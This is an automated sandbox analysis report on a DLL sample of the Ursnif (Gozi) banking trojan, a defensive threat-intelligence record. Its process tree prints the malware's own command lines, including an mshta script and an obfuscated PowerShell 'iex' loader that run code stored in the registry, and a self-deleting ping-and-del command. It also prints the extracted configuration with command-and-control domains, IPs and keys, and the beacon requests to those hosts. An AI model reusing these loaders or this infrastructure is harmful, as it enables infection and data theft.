Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7078612.dll

Overview

General Information

Sample Name:7078612.dll
Analysis ID:752294
MD5:cba263871219062d981111b00cc131fc
SHA1:50e2c7caf7dd0f826bc6e814bd62fbb39982ceed
SHA256:65f687a5c0e757cd8e296f8b0453b27726e5017502e93dcb8379d59fe9c056a3
Tags:dllUrsnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Self deletion via cmd or bat file
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 2128 cmdline: loaddll32.exe "C:\Users\user\Desktop\7078612.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1132 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5108 cmdline: rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 5160 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 1120 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 5740 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qnma='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qnma).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([System.Text.Encoding]::ASCII.GetString((cyynsofy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 3444 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 984 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE9EF.tmp" "c:\Users\user\AppData\Local\Temp\CSC256FD05AD86B46298536785867B2F65B.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5116 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6064 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF4AD.tmp" "c:\Users\user\AppData\Local\Temp\CSCCB299674C9DE4DC69C5A44CA79DFE4B3.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3320 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 4120 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\7078612.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 3764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 2828 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4060 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
  • cleanup
{"RSA Public Key": "bdyFPOOFadPIE+3Dpt3w3yYYobtlUfGHmkNXXhEHJZrgq+pMKFl/sc2wfLGDAcGr6aqONRURpCfnbKsvcUbIGVS0tUVr4USeghefWwgL9ZQvVt+Wms+/fsaQ4VA9haNvCrTsNgywFQRd86atcQ5HZEvnzynAU+sWx3vgEy3de6xYedEo9QwkMZmOY1efWAGBuAhNzJ+zgYb92lBu1HFwMVWas966cpiEbynar9CpsNFqdLF1t7yizeW2KS+obTRWgYChp39Cmdcy6zxrZh+Fibssh3hcSOGQo3AqO9V622C23Z3ve8vsR2k0wPicse7/Fu+H0+OaWRh90FFOWVCYiIyOZEuvmKiznuluuDx1iWA=", "c2_domain": ["internetwork.top", "interspin.top", "groupconnect.info", "onlinegroup.pw", "onlinesgroup.top", "directoronliner.ru", "directoronliner.su", "premiumdocs.ru", "premiumdocs.info", "dendexmm.com", "fortrexmll.com", "31.207.46.12", "31.207.46.126"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "0gV5XR1ZycScNvAe", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "5050", "SetWaitableTimer_value": "1"}
SourceRuleDescriptionAuthorStrings
00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
  • 0xff0:$a1: /C ping localhost -n %u && del "%s"
  • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xca8:$a5: filename="%.4u.%lu"
  • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe72:$a9: &whoami=%s
  • 0xe5a:$a10: %u.%u_%u_%u_x%u
  • 0xc22:$a11: size=%u&hash=0x%08x
  • 0xc13:$a12: &uptime=%u
  • 0xda7:$a13: %systemroot%\system32\c_1252.nls
  • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
  • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
  • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
  • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
  • 0x1cf8:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0xff0:$a1: /C ping localhost -n %u && del "%s"
    • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xca8:$a5: filename="%.4u.%lu"
    • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe72:$a9: &whoami=%s
    • 0xe5a:$a10: %u.%u_%u_%u_x%u
    • 0xc22:$a11: size=%u&hash=0x%08x
    • 0xc13:$a12: &uptime=%u
    • 0xda7:$a13: %systemroot%\system32\c_1252.nls
    • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1cf8:$a9: Software\AppDataLow\Software\Microsoft\
    Click to see the 54 entries

    Data Obfuscation

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([System.Text.Encoding]::ASCII.GetString((cyynsofy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5872, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline, ProcessId: 3444, ProcessName: csc.exe
    Timestamp:192.168.2.7172.105.103.20749718802033203 11/23/22-10:55:47.657666
    SID:2033203
    Source Port:49718
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.731.41.44.5149712802033203 11/23/22-10:55:05.800807
    SID:2033203
    Source Port:49712
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.731.207.46.12449722802033203 11/23/22-10:57:07.914871
    SID:2033203
    Source Port:49722
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.78.8.8.850505532023883 11/23/22-10:55:05.538404
    SID:2023883
    Source Port:50505
    Destination Port:53
    Protocol:UDP
    Classtype:Potentially Bad Traffic
    Timestamp:192.168.2.731.207.46.12449722802033204 11/23/22-10:57:08.286256
    SID:2033204
    Source Port:49722
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.713.107.42.1649711802033204 11/23/22-10:54:45.174848
    SID:2033204
    Source Port:49711
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.7172.105.103.20749718802033204 11/23/22-10:55:47.657666
    SID:2033204
    Source Port:49718
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.713.107.42.1649711802033203 11/23/22-10:54:45.174848
    SID:2033203
    Source Port:49711
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: http://internetcoca.in/jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lAvira URL Cloud: Label: malware
    Source: http://internetcoca.in/Avira URL Cloud: Label: malware
    Source: http://internetcoca.in/aAvira URL Cloud: Label: malware
    Source: http://internetcoca.in/jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bobAvira URL Cloud: Label: malware
    Source: internetcoca.inVirustotal: Detection: 20%Perma Link
    Source: 7078612.dllJoe Sandbox ML: detected
    Source: 00000003.00000002.684277856.0000000000D90000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "bdyFPOOFadPIE+3Dpt3w3yYYobtlUfGHmkNXXhEHJZrgq+pMKFl/sc2wfLGDAcGr6aqONRURpCfnbKsvcUbIGVS0tUVr4USeghefWwgL9ZQvVt+Wms+/fsaQ4VA9haNvCrTsNgywFQRd86atcQ5HZEvnzynAU+sWx3vgEy3de6xYedEo9QwkMZmOY1efWAGBuAhNzJ+zgYb92lBu1HFwMVWas966cpiEbynar9CpsNFqdLF1t7yizeW2KS+obTRWgYChp39Cmdcy6zxrZh+Fibssh3hcSOGQo3AqO9V622C23Z3ve8vsR2k0wPicse7/Fu+H0+OaWRh90FFOWVCYiIyOZEuvmKiznuluuDx1iWA=", "c2_domain": ["internetwork.top", "interspin.top", "groupconnect.info", "onlinegroup.pw", "onlinesgroup.top", "directoronliner.ru", "directoronliner.su", "premiumdocs.ru", "premiumdocs.info", "dendexmm.com", "fortrexmll.com", "31.207.46.12", "31.207.46.126"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "0gV5XR1ZycScNvAe", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "5050", "SetWaitableTimer_value": "1"}
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D52F6 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
    Source: 7078612.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
    Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.633082420.0000000006580000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.626656927.0000000006580000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.633082420.0000000006580000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.626656927.0000000006580000.00000004.00001000.00020000.00000000.sdmp

    Networking

    barindex
    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.41.44.51 80
    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.207.46.124 80
    Source: C:\Windows\SysWOW64\rundll32.exeDomain query: internetcoca.in
    Source: C:\Windows\SysWOW64\rundll32.exeDomain query: meganetwork.top
    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 172.105.103.207 80
    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 62.173.149.9 80
    Source: C:\Windows\SysWOW64\rundll32.exeDomain query: supernetwork.top
    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49711 -> 13.107.42.16:80
    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49711 -> 13.107.42.16:80
    Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.7:50505 -> 8.8.8.8:53
    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49712 -> 31.41.44.51:80
    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49718 -> 172.105.103.207:80
    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49718 -> 172.105.103.207:80
    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49722 -> 31.207.46.124:80
    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49722 -> 31.207.46.124:80
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
    Source: Joe Sandbox ViewASN Name: ASRELINKRU ASRELINKRU
    Source: Joe Sandbox ViewASN Name: HOSTKEY-ASNL HOSTKEY-ASNL
    Source: Joe Sandbox ViewIP Address: 172.105.103.207 172.105.103.207
    Source: global trafficHTTP traffic detected: GET /jerry/hMt_2FkMsACDp/Ggtycrpr/3jyWUhPR8uVsI6k_2Bbu1hb/kdbdt_2BOm/9tP_2BQtD9vLJNuMH/RpW6bg0QRvZX/QXfPDGL10GT/SdaapIAklDbfEO/Uj_2BAmamwU2u8BHod3aP/PgD0dTDTJEMSc0UK/j1e9AdZnRhxmLd2/iyZSWXfqsPP5Mz2_2F/RxfeMhVZi/snsYr1rBTn9DbB3n1htJ/THaNUdrjEpMaPV5FZB0/hnSI3F95hi8RSrq2PqAvJg/NhyoyNMSlw300/RuRhnMAi/yuKjfRG8BZDb0ZtEsV/Y0c.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: meganetwork.topConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /jerry/c5L4i7gs7U/TPlgCZUjVlFX76S6w/ptrxQO4jUOhI/F6ePNzRyuKF/MbNtzcp0Ju65aR/ZLc8q9AvlDxusKBXZEkxW/7UMIMirPk3DmAiEd/MIUggpPiQ7ixyfB/FE8tNplPzMQkKS2ZFu/JXFIU12Aw/jv5mVYFsQ20lg4INnqbs/F8R3I0LYx88osTnvgV0/etG2XQldFgo6x4JgYsuQNF/j4JQ96Ft17Rz7/eCxN97dQ/rJhcjYfddaM8eJW_2Fean2z/A92cM0Ky22/lOBKLw85du6YHY_2B/3g2GAbm.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: supernetwork.topConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: internetcoca.inConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: internetcoca.inConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: internetcoca.inConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /jerry/jTzxAnqL2OvVUr_2F/fauV7gAxn9qx/8pFCJL9tnDU/iLzaMJ4HX1GykO/HoC2Mc7MKhdMVEZs5LHn1/1_2BHT6MZAolHFOS/6QcVb6Sy1jmNhbf/GYszPrGfJFenuaRQz6/_2BhFQScX/2I2_2FVeVKW5cCoy7gT4/8KYwuw3rx60555o08Kn/opCh843XnHy29nfuXF6b2z/huTk_2FUjzUDI/ISxuKPlx/DZKqk4ugdLqCYc3dzjZ_2Br/21q0mwi2jT/PIT_2FnEyJ3MqtVh6/qexCz0xFpyCT/BYpr5_2B38q/mb5tW8uXYlLBsL/HRJTV7U9DpT/Lb.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.207.46.124Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /jerry/3nn_2BNEVXd0Rxht2AWGTxC/GW4p8XGNLb/FjhKQ84fH_2BkNicF/oP5tQPlnMrJr/VzmSaztxByX/Gj2CVVFo49mQFm/C9zaruRo3JRcHrjSr91x3/QFYBC_2FsxN_2B7X/uufaTAjpOm99699/Pq_2FSETrsZSqN9Ojz/3qeuXW2xr/R0a72t7BsPAzZ_2BbGig/RJ4QPZizbCIE_2Fbc3V/bnU9fiqNJ0ptmBxGj2iZqV/2_2BtpYpuaB39/FW0ST0qr/ePsn6GFPOwexxSy3EgaplHS/uHjfw_2BI_/2BU_2B8F8OF00pKIM/YJkKjo7czRDc/E_2BThKsX/cG_2Fr.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.207.46.124Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /jerry/5BN0ICz4uWiAkFly3NWE/wdb3AqkjVSwyFUhuqrz/lHc_2B4wxe4nLA1HUOqfnP/QlJbnXjOv_2Ft/Q5KyRgYr/iv5NSA792h1xHcDS5L6fsEG/6f6Mo_2Fxe/zRCCWBAwTeLJqLbV9/kqNgWULptALz/6SvcsPi5EHX/ePWs4WCPyL8a8x/7zSS0_2F0FPHafzsv8Nrj/_2FvbJqIrbuIliTu/28Zs8gl0EBncgLE/E0Xb7wwqBhrlCP2lDF/LuKqKVbSw/I0P0F2TMmM1CY00Wt6n5/Qvz8fbopIWFtWKI6Q1E/CrYECeKd/SC2ahZciZ/j0v83.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.207.46.124Connection: Keep-AliveCache-Control: no-cache
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
